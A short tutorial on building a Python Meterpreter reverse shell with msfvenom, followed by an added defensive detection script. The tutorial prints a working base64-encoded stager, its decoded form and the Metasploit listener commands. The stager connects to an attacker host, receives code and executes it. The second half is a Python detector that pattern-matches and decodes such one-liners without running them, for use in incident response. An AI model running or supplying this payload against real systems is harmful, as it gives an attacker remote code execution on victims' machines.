- Python Meterpreter Reverse Shell
- by john mahugu
- So, not so recently, support was added to Metasploit for a native Python Meterpreter. The cool thing about this is that the victim only needs to execute a few small lines of code.
- This means that if you’re performing a local lockdown test and manage to get access to a Python shell, it won't take much more effort to turn this into a Meterpreter session.
- msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
- import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
- This is simply Python code that is base64-encoded:
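- import socket,struct
- s=socket.socket(2,1)                  # AF_INET, SOCK_STREAM
- s.connect(('192.168.90.1',1234))      # outbound TCP connection to LHOST:LPORT
- l=struct.unpack('>I',s.recv(4))[0]    # 4-byte big-endian length of the data that follows
- d=s.recv(4096)
- while len(d)!=l:
-     d+=s.recv(4096)
- exec(d,{'s':s})                       # run the received code with the socket in scope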
- Then you just need to set up the listener within Metasploit and hey presto!
- msf3> use exploit/multi/handler
- msf3> set payload python/meterpreter/reverse_tcp
- msf3> set LHOST 192.168.90.1
- msf3> exploit
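Seen from the defender's side, the one-liner above has a recognisable shape: base64 text passed straight to exec, which decodes to a socket connect, a 4-byte length read and a second exec. The following detection sketch is an added example, not part of the original paste or of Metasploit; the function names and sample lines are constructed, and the stager text is only decoded and pattern-matched, never executed.

```python
import base64
import re

# exec(base64.b64decode('...')) as it appears in a command line or script body.
B64_EXEC = re.compile(r"exec\s*\(\s*base64\.b64decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
# Traits of the decoded stager shown above.
TRAITS = {
    "socket_connect": re.compile(r"\.connect\s*\(\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)"),
    "length_prefix": re.compile(r"struct\.unpack\s*\(\s*['\"]>I['\"]"),
    "exec_received": re.compile(r"\bexec\s*\("),
}

def inspect_text(text):
    """Return a finding dict for one command line or script body, or None if clean."""
    m = B64_EXEC.search(text)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"traits": [], "endpoint": None, "note": "undecodable base64 passed to exec"}
    hits = [name for name, rx in TRAITS.items() if rx.search(decoded)]
    conn = TRAITS["socket_connect"].search(decoded)
    endpoint = (conn.group(1), int(conn.group(2))) if conn else None
    note = "staged network loader" if len(hits) == len(TRAITS) else "encoded exec"
    return {"traits": hits, "endpoint": endpoint, "note": note}

def wrap(src):
    """Build the one-liner form around src (used only to construct sample data)."""
    return "import base64; exec(base64.b64decode('%s'))" % base64.b64encode(src.encode()).decode()

# Constructed sample text mirroring the decoded stager above; it is a string, never run.
STAGER = ("import socket,struct\ns=socket.socket(2,1)\ns.connect(('192.168.90.1',1234))\n"
          "l=struct.unpack('>I',s.recv(4))[0]\nd=s.recv(4096)\nwhile len(d)!=l:\n"
          "\td+=s.recv(4096)\nexec(d,{'s':s})\n")

# Constructed process command lines, as an EDR or auditd feed might record them.
SAMPLES = [
    'python -c "%s"' % wrap(STAGER),
    "python -c \"import base64; print(base64.b64decode('aGVsbG8='))\"",
    'python -c "%s"' % wrap("print(1)"),
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect_text(line))
```

The recovered endpoint gives responders a concrete address and port to search for in firewall and proxy logs.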